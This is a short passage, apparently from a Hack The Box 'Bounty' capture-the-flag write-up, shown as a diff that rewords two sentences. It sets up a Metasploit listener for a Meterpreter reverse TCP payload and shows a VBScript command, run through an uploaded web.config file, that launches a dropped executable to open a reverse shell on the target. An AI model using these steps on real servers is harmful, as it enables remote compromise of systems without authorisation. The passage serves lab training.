Bounty WriteupHow to resolve HTB Bounty

 host$ msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST ip.ip.ip.ip msf exploit(multi/handler) > set LPORT port msf exploit(multi/handler) > run

-With this we are ready to initiate our reverse shell.
-In order to do this we need to run our exploit on the server with the same RCE method as before, changing the command to the following:
+With this, we are ready to initiate our reverse shell.
+In order to do it, we need to run our exploit on the server with the same RCE method as before, changing the command to the following:

 Set cmd1 = wShell1.Exec("cmd.exe /c C:\Windows\Temp\myexploit.exe")

 Upload it, open the page of the web.config file and we have our reverse shell.